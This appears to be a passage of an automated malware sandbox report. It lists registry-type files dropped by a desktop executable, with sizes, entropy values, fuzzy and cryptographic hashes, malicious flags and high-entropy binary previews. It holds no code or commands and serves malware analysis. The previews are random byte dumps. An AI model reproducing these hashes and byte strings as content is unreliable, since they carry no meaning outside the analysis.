              Entropy (8bit):7.980364942955137
              Encrypted:false
              SSDEEP:192:YUMBKru715o2iugTs6TUTt/3xXSEpmp6ttPNYbasxhbdhyeNgljj:BMB685TiuGTTUpiE0oHPNYGsny
              MD5:46223F1AFFA57DA895B334C317CB976D
              SHA1:674B978FC8EFAE7CCF5DE21DA1117270E8B66BC4
              SHA-256:9260580506358139B006D2C3EE088EA2B6162061F3DDE3A78E6410BCC04C8A2C
              SHA-512:73F66068BFA294914957DFAE80D3D339E8F843B1C88CAB6F0182FB38EB6E8A95AB4F0D567A81DFCA6609A39814A29A5898B7DBB43FF7682EDE4335C98D512A98
              Malicious:false
              Preview:regf..?[D...E...Y.e. .....NUU..^hPN..r.=.1.6..7.gis...g..A......(.2.I.9...h...o.zd. GJ~.:A.n....|.h......2.....R.......D.q.......da.$+q[..j.e..0r.)rQ..@..B..u&..94.({..?..820.{s..bo...]s.G.S........I#...........T..F......bd..6......RM..<#..<~Y..j..M./ X..#^.HYg............RmZ5..a.....Pd.D....1.K.q.p..,.f.;..g.QJ1..2.+..i..x..n..]>.>}...(.....9\.;....g.....y.S|....(=..*".........~."<u.....z....K.d.._m.....'.gp......=,E..G..`5=.f...MO..i.X!........{b1.Hz.&y..Rv..P[...@J;.&...{..=...2Br.B....3..f~.h....t..L>tsZ.P.S..}M...:T.......%.e..h......$c....]{r.B.>qP.h*......V.....R...m@..,.....+}.9z.|..:.T+..X...0..J).\.....'.c....HQK.!Y}......q.p..X..(..?.I...=..G..j..m-(k..q..V:.............Q....L..^me..P.UUX...;@.bY.......2..8...5X2.M.d]/...^."..HW.A".9..}x.yC"....*.U-..............;@Q..$....P.....l..........1...o.....c.1}{3..#I..v.e....@..1.....}..sC...DQ2...f...;6..z-...R.n..../..GF.h5..5..i........<.d..8'&./..........J....A..J....A...........9;.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977948076339911
              Encrypted:false
              SSDEEP:192:IeUKxLMRr6wynU103t4fXzTJ+Y2O7K7b1cIXvGWs:dLMCnkut4zTJUKK2P
              MD5:D144FB95076633F2700C5D91E617D6CF
              SHA1:929236BA0FB2E3B50C8EDD15BD29FD4A41AD125A
              SHA-256:6E28352D3796CBF296946C79FF551B39EE4801260077D5A656EC01216D4AD7F2
              SHA-512:A7E0A569134C1DA4A417FF283653888C0E6690DED81C9184C531BA9223D35C0CD174CC508FA83F99ECB3CDFB23B67BB7F22249EF9267D8A9AB9C402EB81BE8DD
              Malicious:false
              Preview:regf.....N{"b..6..&.....)........X&.,..d.P!.e.........x....2.g..=.vZ..... .!.*f...=.W'c.n....X..... r...1..........g..:!=)......C..>....g.......W.F..(..o9}...mS._i~..!FRg..|.z;jQ..Qm..Z........y.....<..B...og.....i....?..U.{.......\R.i....>..u.M..o..C.h....iXl..N#V.g....km..|<.w..3...r.qz...E7?.R.....5.m.Y._"....vrG*}4j.....4.#........M..N.o..m:1........H...?..O.......Oqa.t"....y.'......G.e.T._.,... o...s.Ql...y.l.>...Q......<`..Z..R..;......p.(z.g".m.1.4i..DE..u............i[..N+.....(.*~...r9...P..q~A=..h.l......'JhR......S....D`V.j!..._.B.q....$...#.........2...;..t.K...xzv.Sp_.B.2.X...;..f.x5ML.r...-..i.....L.J7........g+L...K..m...\.-.WV..[.........7.t.U,_..i .....m:V.H.#.;l...q.........N..4o...g.hXz/M.....=..3....^...87 ...L.b.oD.q.57.Z!...o....8._.....@.,..~T.r......1......H.L...].?$Ut.....&^..._..z2...........,??;.g.$.)..Qu....."7.|.Bj.*.(\.]...p......%T....`.......@L.us./.....Pc....S..,..i.z%..&.S
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980058032822589
              Encrypted:false
              SSDEEP:192:R6+O0bK2nmvt/dmx1UvTF35Czk0Sq5Q+0r4GEVUyNrMUPmQBewEuU1cS8wFc:RJKTQU7+4U5X0rjEVRhNrlUSS8wFc
              MD5:881DE857A5FD20FC8568DEB72138A923
              SHA1:0591519D6298C2BD1EBB54BD14E8E1F8DEFF7EBF
              SHA-256:8AAED0374C46C30365904366A5B4948C6A543806E8D8B86E876456657EECCB8F
              SHA-512:590BA6C4B2FB07F0176561019EEDCCE8B168B3567903303993AC81AAEF78CB2150F2146EE944E553CB89FA6495CA3A81A7854FB576F41FD6165AD0339C1608A1
              Malicious:false
              Preview:regf...e...A.<.O.Ai.V_.%..q............U.:[..{uC.".+..R"Z.. ..q..&..8q.~..d<.{....dG..a.....ly..FH>.ge%3.[...c.%Ba........C....c...h...AP..(pdN..........6..=nM^....T.9........../5.j...G.c...i.cD...u....1.T.mY.....ahNK(=..17i.9......M;....efS..M..j.N..b.UO...,=NNp.;:E..R[.."..$WS..........K....~...Z..O....&.79U?..^.z.....tv.F|.r...v.SK...........=....c8..^P.d....Q...<.....\.[<..2.S..[..f..N.R.....)M.)1 ......4Q.?...E&....g...Z....w-.OW....Y...<....1...!.....).v.~'.S.j..N..U....s...s..el.n.?<....[.rH..3....X.......l....;.?...:5...A|....G{...!..W....X.-4u..H!.#.j..S...n9<QLq...Q..C....O.Y..U.%.?mf..1.....*{...<g..`.._.vJ..>....1.,..h......K.wP...cT...p..........E.-......#.>....Y-..-D.c.@..Mg3...HF......wnz..g...r..[bi2...B"..6E^3s........j........=...o...-.".<...<.ru.....]c.=Zl.A9..8|$.............H|n..RC.2...@_...R..D.(...Q..( .....nM.!...h......{:...v.....3$.....MdLo.-.....q.&.f.m\.?n.......;&C/1.X...dG........a.y.0M1..e...;.].?p
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978034061350446
              Encrypted:false
              SSDEEP:192:T46dR9sodEw6c2RNC47vbzymfb9gwezEtaSl+JeOtujlQYoJLVO:Tvd5uwYRNjTyctMgdLlQYoJI
              MD5:FCCFA860681496CC88DEAAE0C47D4F93
              SHA1:3B98926724395AC60823712F19F3DB5B0824923A
              SHA-256:F580C15460C89AB6BB4CF6279F599F6ABE39EF3D5CF2F03D079E3A66BCDA9960
              SHA-512:845A71606FF66828FC573588A2BFA3F44B3C0622C186C6BF5FC19273FB181020FEB39623B3E76307614FF97A51080FAE502A542764BECB36BD59CBCCCE00D8AF
              Malicious:false
              Preview:regf..].V:N8......b7...^...xQ...E......|.D.K..m.......J..n|.A.....M[..+..CY..yX...Q.=.k...v....y.~v0;O.R.f.J'.V.o(U2%.@*D'}....O...|..,.3.4>...].)....&0...9a...?.3.Y..kI.J..>#...f...S&.....~X....hPzf.g.9...I.]..;..+n...?<...#EQX|...c8$..l....3Hc.....QO..9...<(.IQ,........g...... ....Ue%...A.w..3...^}i....S..`...V.0... Z....E.....R.oeh.O..8....'..JWB.cN..yyY.Myt.j....JHt..p@....<}i. O.........~..n...6./.T}.2 =L.........e....q..n.5<&...d>[.+..|.<.W...n.:.;%...h.....UPs..8$..H!.M..Mr.%.(..W...A..\`.r].~I.....|!.9..aw......-....m24.,..T.].E.R........A<q..b.C.(2.$S..Nq.\.GJ.D.u....O?#/c.[.`....y.....S...l.F....n+.Vj.F.../).5O...I.......:|...X..c-..A4.Fq..Ia..........$_.=,^.$..0......;. 7.......1.........< ......6..$#.%.L.(LD.pmAa,@..>.bh..>:.r[..ER.....~...]......R.=...dT.L*.WM7*..E.....7=2d.q@.;A.....y.#...It...&..d....z.T.....[.K.|.X.....eO.pTea.Dk~.q.C...Z...G.7...unl..u..c.o..^1}....>...........f..V.9..z.l..M.B.&..Zx...|..+.a..)M.$M.Z..N
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978403788263713
              Encrypted:false
              SSDEEP:192:nJ98sydakFg3TIyKmGJ4QYY+gOmllsRdTq5LhmtY/INvazzrWIuzbAwA9:nvRy63kyEJ43YzOmlKcmawhezrWIGK
              MD5:9395687BA4733EB39C87D29C176EB09E
              SHA1:C7D2040D57F2946327206F715EB15818451C3261
              SHA-256:3B38CA91EC02E70EFD1E7B27A02D212477383769F49DBD16E60AE33895CA6155
              SHA-512:DFF88AF7833EC237F79638FA2827A5040EC53CE56A1102B23FD8EB90866F0540A457E054F54F617B4088F4D026E342EF4421FCCAE9AF6A89230EB6D8AC28A2AA
              Malicious:false
              Preview:regf.i..2Q.Y.r.w.../wl3.Q...^.4R...7.v3d...4.pv....l....).......Z.$|...V..0y...;.w...m..Q.....+5.{0..FG*.......3...Z...e..K..........uy.......;........b....E...U.I7.c(....7.T&.F...{z(...*...]....\K.4#.r.,.{SCAh.....E..$...o...%...0..!-..\...).7.EA)..~]..x.."...j|L.d^.a..../.z<.a..9V...Z..C.bd...S/.....d...X...0.....-){c]_WM{F..O..Dup"#...........6.@.!...i.......3.e.7.J.`.R.....7&H....'.p%....#CV].UB....d..l.4......L....m".......qh.......4/..n.2....#........K..Pb[".....'.M.:.(....4..2....|r..R.[.J..>.}..x...I...N...c....&.....Q....j...B.xh..a&./.%..:H........3...e..i?#.+b?..Y......q...R......l.3..^..$g.(7...c.YQ.>}A`.D.(....x..A....8.a.n.-..z.<..k3..B[.ob...5<D.:s....]...x3...Q..R;6........k..?{......:Z...b..>..'.Z%2.....N;..Z..t+.N31..Q.:.-..2..F~_$......M........&8......R.Y......2._....3......Y........_......,w;e9b..P.._.,. ...w..].........d...i..q'H..<@^$..3..C\.d ..........<....../..r.?..)v......0.y.A]2...0...t}o.....A...tE.r...f.O.#-..T.,.<
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980416172859986
              Encrypted:false
              SSDEEP:192:8d7Tk28DwYf1iMb5LJatuq0HbZju8BY38R:87Tk28EYsMb5LIsq0w8y36
              MD5:6D06B94E4D682CF487CA96CD4547E9D3
              SHA1:D39944FADB6FBC55A858EAB05E2A818C98BD8747
              SHA-256:B999A792856BAECEFF8CF968324CA6DF50F785741162804F060AE47EFD4E24D3
              SHA-512:E7EECF3B38D3A6BF8D3EA66F79B51DEAB7409C80FB7F1FA62023A71DA0B9D7E412E40EF8C37C50C9900BDDD59AB81A2F7326A40FA86120D32F1CC176B0787D64
              Malicious:false
              Preview:regf.|.(.u.V.%..X...G.........O.%.......:_...#..+.w.>7^/!4..f(...B.?.z"L..:..<......dC...5..z;.t......J.E..z#..f.-Y...y....x........q,J${.t4.@...R.y.....#OOj.b..`_....&.*....V.0...............o.s-.E.FFe......C.lav9..R:$.(..H%.;~...C!\...a.J._.$.<.v6......._.?.....Q.....2...&..a..zv....'a.....L......>C=t.....MB..64.&.......s..(....w.....uv....5......2.l..}U.E...kz..w..z.f..<o.........5{.cd..ii.`.@.l.(....g..w1...y..4i...I.b..>.ehU.. ..T..HG|3?*..wH.!8&?;9...rhv......r...@..W.d.D.t[....L.. .'y/.Ev.u.6.........,.w.....^..V.E.'......".l...)"."..[I?..R..4...}Mx..gk.|.p.....'.....K....bS.....:..&.<..._..iRC7.b....-b.&.,Jn.*@..U.:%}I#.....o8.iJ.......Z...X.lb....\.Qvd.}...P..r...c..|...2.u.eL0#..ta.'.{..J...6U......8.kF.<&...."..D.23..L.P...m.8,.Qa!.f*...9...O..Am p.E......".I..g......K8...l..._B.....S.2.Y)=...z...H.Qa.....Nu...dX.l......K....M.j_Q+.e.Vz.C Z..R....I.[..u......T..\5c.."-..j_......)m6..e..*.T.Ba.x.-:.....7 ...+..$}..A....Q7.!.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97577215611187
              Encrypted:false
              SSDEEP:192:2czFkAVqYmnhlQnJZQY+qHa7/nQSIDSnQW9D:2czmAsYIQJUzrnQVqh
              MD5:45515B2AD2048EC68CD45CF04679BF39
              SHA1:D059B88EC3A1C11A2847CD990E0485DEB092C840
              SHA-256:133113EF3CBDA1D2DFD92720F0AFE0E29A76743C13AF32D3BB9BD23E06321791
              SHA-512:D2B37886D6DA9D01F58D6583A74205406077C9A9C8FA40B214347CCDB9FD6386EF8225CA548B5FE7FB7D021C9865A9422200AB3F70564C54B8FE6955986649CC
              Malicious:false
              Preview:regf.%/|.Em:;A...v=..._....M..:..1...f.G..j,=.4.{......JV....6&D.n.-A....r.|a8[0HW.J..M..V.7j>...}../....R.8,..L.qR...1%.....1].E;.L.......hA...n...N...L....B-..&...9&..(.......^|...{.#Ts.6/".....f.....z%.u0...|j...8xt;.`.......\I.Y...iC;..X..&...;c.Gn..$G.......F;e......$.3%...yA...L.C..{zT<5.s.C.m...!.....E.C.....O...\...X..V.c.G..F.RT.../..6#.O.e.u..]s?..T-..8.J4R..3..N...]I,...'.@{..3.o..4..j4T.c0.L......g.......#f...#..n..a.V.<+M....v...%5. qy..D./.c....~..0.L....QG.=.1.,.].....^O|..g..o....6..C.u.\.........s...I.).~.7..R...7=......+......J.B1.(.j.Q....e*...... G1F=....b..zF..u.uB..}[..U.E.. V.r..sUX....y7.@..)M{...M...(.....=.$..E...l..C.F\s,rs...`.kM.;..@.$...7-w....H......R.J+....m......}e.2ca.=\.....p..J.o..7..6..d..F..!...3X.g..o..jy....*....9..x.Y.0\.U7b.o..r.F..c;(..d6\.A6.....86..T=/..-.#...r.....B.a.SU..}..H..f..K...~..<@%....i....[...YA.#...hV.......7=..e.P8.ig~3.o.._.`i....._P&`:.!;[[........+..qa=.............-.CR.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979479761340987
              Encrypted:false
              SSDEEP:192:sTXnccLSEQyDDsgPEK2SyADtdJERESyJzF9b:sTXFLQGvsK2rKJERuJzP
              MD5:EDFECA0F5490AC763A9ABF19912AE0CA
              SHA1:81A13E9B1CA355EC8204017E9E5F74F9E85A4FA6
              SHA-256:901D7F0E43F4B05D71B7B581AF3C639964064160684E124E6B8A20797F8AEE59
              SHA-512:381A23005E9D7839B3EC6F7C4A9C7BC945E9D890F9BAB25CC6F39B83DA34192783A9FE82025E672657E6B008043ED6FA1E9670B82C57BD833FE69DD541892FA1
              Malicious:false
              Preview:regf..v..!*.~..I.X.|7..p.f,y......k...9Gt..j..U.P.Q.}?...4h......70.,.".~.....@!..c...pjJao=.K.v#...D....O. ....C.{@....R...J!..c..Q.|j...J].eJW.....U..5...%tZ.,(..h*n.]YS.........y...u....Q..uP5.^)e.`=#|....><...~%.H.h.8..+.UU.....Y{..9.e.~.O5.\A....^8..E....v...I.D.9......W....i.j.~......J.F..%........ZD..X..v..|MD..Ti..i-.w...oE.g....^.j....../....lPX......f...fg1,..X....&.j.<.`!u..>....4-.ywU..k.u.....M....4.AuE.Wi..iz.2.*... p..d&.q..y....#.....a...A<..<.=.....F..)5C.a.dlAg.../.{...x..m...9W.4@.{O...67....%.1j.F..........;FRz.......0!...- ..!.W....%...~A.g...+.k}.7..S2wC4.A....~i...&.*....A...B..\~..>..M_..............F.$O.l...q;..%...$.....n..V.R!.(.(.+...]..j"....`...J0.....6..uPb.h..9..'.(.(..R.(..*..1.qqpw..Z(B..6.o,z...;.uA.M*!..H....F..DO}..;....Z..2i....H..9;.R...?..G.I8.."&.....[...T.k..D...}e.#......}...A...oI..p.rG..!......#zj......_}.S.....2.m~.8e..kl..@.4l5.H...zs.._>J..N....LmM@.r.. X3.dX..M...K.K...8......q..\...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.972138093187792
              Encrypted:false
              SSDEEP:192:T6/LaoOve62FAhoFBtReoNpyWvUpVjKRAjShWfbmVluXAmbos+:TmLRU2FOojeofujKRAeUKUqH
              MD5:142F0E7A6321EF967D2FD94A0CB229DA
              SHA1:9377135BC25C16DAD3CF881FAC4FB296382F336E
              SHA-256:2D1E28F505A1FCAADD2BA3F28CA8315F86EC7465EBB4E126B047687A8A354BBF
              SHA-512:C634C3728B76449AAB36ED03197A01F067F4E272C9A0B95CCE51B6FB8861D0B2CC81BC02913527ED800BDA3F312DF296B44E16E45380CDD5AC5E9A257671CC62
              Malicious:false
              Preview:regf.. ....4%........NB...F.Z^..+jmN."Z..S...D.F...>.w...<...........rl=....k.o..Q..S....M.j&....y...8.:K..U..+..dq.5..Q..}.+x..v.....X..B..5...&.g...8.x.-......v...f...m.|.c.V.s.CR.4....k...%O....[.;.$.....{..LX._'|U.........n.m...+a...d..[..#..c...t?.....%.....s;.....``6.....S....Jr89...>kj1.N...(...........$.....N.mp.mz@o.......N..k/e2(..q.j.^.1.^.L5..5..E.X.m..V-=...P.J.1.#......3_.e..S;.P..a.~}.B...8~....?P.F.V...<...(m.J/...M...e..".......1....k.=.R.m.\....C.x...M...S......i..MP..x..^.6Y..I;..-.Sp.@."k..v...3 .:..ou.(9..r=.LW....=..y.q..O...AT..z.K...x..Z..l5...L..x,{.. .. p.........c..1...o.[.#..mGo}_U..r>.r..q.*D.}.=.=^(Br."7....p.U.....w...\}.w.{)..#H.a.f6..u.M..7..........|.p"d.b.m..@.5...f..RZ.+../.1.).%V..C.~_....u..[.n.e.e..f...B..="lq.2<...s...q@3KF.M....~e. Eog. .;...u.\A:...?X ...^..]..c.s...X.Qm..x.%1...~.))0.X.j..Z.aP.....2.9!P..T...W...Q..X.U..G'.W.]..<./..v.*=. ....yc.....n.0...p.......kq.("}V@d...[h...{.....w.H..;5.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9777633054713055
              Encrypted:false
              SSDEEP:192:tOrilsWScPC0BwhevVvOdYkmIzRh/AV4ojyoZbW8O9r:Y+ScPCmw8vVvJIzRyS2W8OF
              MD5:44EA253C83911663A1F20D77A1F4CECD
              SHA1:FC21DAE69271CA41E81F4DB99D2437E907E4C80A
              SHA-256:44BFA889FF34C6533D7C8E58B179FEA01607057FFEE8E87DDCE91B0609C9FDDA
              SHA-512:93BA28F155DA0656456AE33F35C0D9DB164E0B6AFE5D225FF944610DCEC620F5E8E7E3C3FB1E4353B95A72731BD5F60568562073E149924C9DBD3B7FAF655BF1
              Malicious:false
              Preview:regf..B...>....O..b88.._g..wF.0..V.&FIc.EP`8..E.k...>..N,W\..L.h..H...C.;o..N.V..>.....30T.7..a4.Z~.X... /r.....RC.a.WzcT\..s.)s.^)...k..p..;..B.......z.6.K.L%.....gJD.*.\.M........Ia+.~.....E...E.............ZJ*N....K./..lC.y....Z2*!}..V......B...T&...J.q.e...,!B.`.V..v.g.<..I........0'wf..q#..X......i..d.F..'d.d..r..L.'3..c....<.-1.nj..B.^mZ..."H-..F.l..|.N.G<Q....J_..J..}OV...U........%y..I..Q..6.....)Qd.s=S*......D"b.~.....R;,&%.S}.U".KB.<....W.r...,Iub.p.<.Q...9..../Mch....R.....v9I..d...?{.l......]S....KW....H7W..zy...s.$.....;w.u.p.FK.tx.#...C....`.~./$....%......u{..Q..O...(....G.J..C.&.|.E.<.vXU..U.....Q...+......X.m.c....1..^F..j..#0..0......r.J..P.C|.r...+........j..6....8{.4w.Z.\D>.N....L3.....#=nW.SH.tU..<qX^.._.E]i..F..U..*|.'m..O..q.Y.V.{.....jEx..P-....?.[..........R.\......S......&...[..j:...ip.....@X.v...Q....B!.`..U{9..._.D......N.q...-.e..u.*%..u..ZZ..]UM...U 4.......CL.k.Jy....&.c..d...6...EU..e1..s.....m...<.f.u...Y"
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978346819276984
              Encrypted:false
              SSDEEP:192:ktQK5ar+MB1Cx44B7qQg7iG4L50ISC0WwYdwk:gg+MB1CxTfTV50WNdwk
              MD5:A7FD726DEDFC812F7E382C6810BB4194
              SHA1:8D33E59A2E0E0F32DF086F73F6EA187410D125D5
              SHA-256:096CD2B5399842DF1E5E0B5C37E8DDDFCA4CC97B503F7117DA0B300CFFCC627D
              SHA-512:950AC6386FCEC2F4B5BB720DC861024FCB241D51B2606FB2CF82F915C538937B7DAC6FA0B105ED999D364A37392491E9C93E1BFFCD10AC44922D19A9F2BF3B6E
              Malicious:false
              Preview:regf.2..G....=..k...L!.>.... .iC..^a"g...0.%..$.oX..... ....].7..../s..5....v.U.).|.z.y.........<c.U."W.F.....r.6Fpo2.*#..GP.~..{tyMh.re.#q.i....B.u{[BeS...P#."...>...'.C.....Ir,...$CaK.........j..j.W.Mq....)..).~.E.6....3.L.x5.L..8..b....}/)..%.oi.FB...E.0..E.<i3G.zw......1M+.s=.B.).rl=3...g...7.6....h.%#.h...#..l.,e.mw?.i..v.H3.;..vZ,....9n...h..:..Lg...dc..;#O..|!.[..;W.G.E_.K.,..G...&.D.........TBA..L..:..?K.yr..[..O2...!...Q..s.j...h.....D..M.b.J..Z.v.!...d....6+.$)P..".KlV....).^.q......s.PQ....|]..#...H..f;dI...............4.P...!..2.I..%.m.....o.L...?)7...i4..f...X...1=.).'..?.7....A.........J'..,..K..V.Z/.......e..l......)>.UlXh......W,.*....<:N....2ST.L?.7"..%N*.y>...[.4....<35..-.........n..j...z.....hF.....f.........6.....B.......e..-.&..P..+.[Gq|......1]...._.o...#..H...J.y..o9.u>..YTT.S...6...`...w..*.O....Ya.d...}U.....D5..KH..[.P...7.:....1..f.g[.#..z0........;.6..[..4.....E.j..|...;.S...g.,|.X.@=....@n
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978536515937931
              Encrypted:false
              SSDEEP:192:aGD/jh0icvXsckn+PDKRigr+nh1cte6SRZzAxTt:1bexVrKRiH/2
              MD5:C710AE78C597726A06987FFAD51D421A
              SHA1:79D702DF185CE72087A392236171B7411C8FB3A7
              SHA-256:3BDC7214F02A7F8257E8A7E4BAEDBFECAC6BE515D20A2D13340C221203E66F6B
              SHA-512:5BF99D4A015F8A90BEDAFF3FF1394EDAC625B8D2C5A08CD04EDFD5A12624014C2B0D46A8C8D0DDD6BB658A024CD19AC20663224BB03988AD1A8612FF2B857A8B
              Malicious:false
              Preview:regf..wE...!...0...8D0$!B.^...rqA<.8.^>Tt...7..../.q5..\WZy_){..n..h.....v.0...Jy..a..i@......[..#%.....,.....A.yY$.[..Y.0..&.....06..%3?......9)#.e..jY..&.2...L6k.<.tn..].Q...'h..k.v..@....P2h.h....~s~;>0J.dDO..d.....xf.S.U8.:.(.%I...|.S...DE.O...M.F..y:...#11'.1&/..j....c....f~....(.Q.....#.M`&..R..T..YP0...(.H\|.Z.!M;..g....w|...I...r....".O.q0.z.N......Q.......W.....5......u........B...^.........\.pd....hp0.L..,.I._..m]/8.h5?."....../s...y....c95%..L...;..=.Q-. ...S6.X.....\@...]R.m}...nw.kv.....%..,.V.}.('q.t...J.....E.^..4q.`"`...).=...Fr....rw2Om.].y.n.....4...$.........L......^...H.<.^T...:".9E.5..?y.i].p..w.}.F..U~.~.E..ah.\......sR...1.M..{.{&.........".....}....;X.}k.m.."}...`.|..`#0......h...j......O.......Hf,h..u.-,.d.#..$(.@.N...Y@i..+Y..,.._.'m.b% ($..7W.a.g.k... .../.....;.."..V.p.h<...oN=....%....Igk..M#...K.."....K.xn.......v0../.#6...tj.`.5.Y.&..H%jg..714i.i....i.....@m.\.....dm.a.f...$.+.g..#kE..H..n....]....l../.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):131406
              Entropy (8bit):7.998742193324253
              Encrypted:true
              SSDEEP:3072:GMM6jsqiPG/wm07xI0YAa1bqzMizppjmW+Y6SpEqX0GG:CCjvMYJBli9paW+fcG
              MD5:9C500229E6D8598E3D1A03EC43662056
              SHA1:9970FF6A3548DDBAEA8925E836485B3DF4E5E616
              SHA-256:B331A48F8CF31D82591E2C8752DC072642689EAE71512AFE1A4B33424F66BD11
              SHA-512:4A8A736AFA2E6E5953AACE973641EEB0C92DEC41E1066D38258DAF3BF1D4BFADBAC4BFDA153D0C8B164FEB4C4674B1578B6386D7DEEEC80F7107CD93BCC087FD
              Malicious:true
              Preview:regf...])...b.2.E..s5f@..<.....E..N:>...Y(i....a3T[X....-..#.S.u.p......P..E..t.....~.M{5..4..K.F......<]...n.r....z js...aX...g............a.-....=.S...8]...8..........6....;0..2.4..I...S....@_9....)....u..P........'.7....b8qYh...i..k...D..w.7~...2...;..4....?.I...(a.Z...*.{..vF.........b..G..1k.....?0..@._DH..(.@.f4...U~.. D.3.VG. +.K^...P.^.r.9.....J._.R...Gx4.!....p.......1.5|q..<$...Z...../......v..r...~u....s.m....i8............/?.l,......zM1....@..oZ..f....S.vT&..\........a.l.C.).+.....j..m..f.)d...A.",L...8Gv..z...z....6.|H{[.....K..........ir..)......|J...43)....iW0:...[#.....@...5*.....Ye{.6[..v.r.E...bG...n.j.&...9f../..SNM...s.z0.~{+.A...W.....14Y..)3..".d..b...[.....R.X.=B`..k......+.Tn?...%w...G..:..j..8S.. .%p.!@.l?....*R...Fs..........b.}.j"!..1......(F..............k..?(.m_.......r...5fd?.O....$.].u..",W`[.+......M..nJw..$,.D!.;..a!..lj#p._......(....UTB0...V[....L...Z..6z.....k57XbyZ&H..+@......GY.F45!qM...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):82254
              Entropy (8bit):7.997685547681386
              Encrypted:true
              SSDEEP:1536:j0uEJjTTSyW1fXw3tFR+Vb39c6pSdPe4XXBu8BF52DfM6NVqIqV5cbQciVhBqQlb:j0pJjvWJX+4Vb3m5PgD9WBVWbI3wm3Zl
              MD5:F8980774BEB8FF1B88E70F4EEFF14075
              SHA1:AEE1B6368154259ED07B140B9097AF7DBC3A5848
              SHA-256:332EE27612256F63C048F711E6AE00E8264199D18BAD14D6B5DF2F67E262F1F7
              SHA-512:0A1A4DBDAEFB8D04A849C4E18F9E5CE2FCC1DFE0DA1E3AA02BB8ACCCF3F65A9040E02233F4FBBFB7BB15C02A3008F0EC9A9CCF876CA0F10ED5A944178B255E37
              Malicious:true
              Preview:regf..<..S..e...n..A&|6$.2..V..X..#V..FBN.i... ...w~G.....=.z..c...".......b.3..&..Q..............._...P.$.../z........E.N.T?.1.w0L...]|.{#.-q...."..<....(+Wb\U.W.C...B....=.:4...,[.......a....q...i....e......W...K..).......?..[.;;..+..`.....k....U_.p5..t......I...U.K(.&..iz.u/.j.^GK[u8....).......4W.%fc .w.O|]..._..".Sv.x.r.....$B~.......3'.....h!...y1S/.9..p....cH.[..L.KQ!O.l..+.I....G..3[vj.a4^.G.X....QS...a.....O.X...nl..`.Ny.."..s`o.{..Po!|......c.4.C.9...(..s... (U..sch].<.,..A(:._$8.(.,........^5.w...............[B@..Z=.5.L@..5......;.\.h.n.?.xm.1..^z.P......e.*.7.XO..!.A;.,m)hXd).}Y.........b.%.G...H}.U............{2.$.`.../..v..\..rr,D.,.(...l.5E.....-F&.-H.o0....E.....9...[..&[2....P!q.B4....L/.^.>..np..ZI.;..N...;.....Q..m.\.N..A...+.M.R<>.\..G..$d........bpv..u..oGWD...y.X...d......fN..Zwvc...C^:D..].u5 C..@.g.@%.......'.C..8..sU.2.X..-.i....$.]...!.....J.......^..D....LU....G. .V.YJ.o._.....3Fb..Cl.@...X.$n..}...:X.....^X!..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):41294
              Entropy (8bit):7.995891230134918
              Encrypted:true
              SSDEEP:768:GpX3mzOYOHlj1/0Lb68C69vH4KLw6Z9ApCO27+NZwYatERPO5tj+2eyn:GQdOH9O54KLw6DwCr7QZXW+C
              MD5:19212A3C794AF725C20A78159AF805FA
              SHA1:773DE25E9B55B114F749137A34BB2441E1779F82
              SHA-256:DA0782F0BD8B028787715655DA7127FF0E7638859809C7BBA07D4EFF102E0D4C
              SHA-512:4E9D94DC37B8708A8A052FBE267D4396BDF4A049CFCFE924D7FE3CADE3F9F176E5E582FBFA5570A63F45B91E8B03AEAFFAE5EAB667ADD4DAE67724E76D83F3C1
              Malicious:true
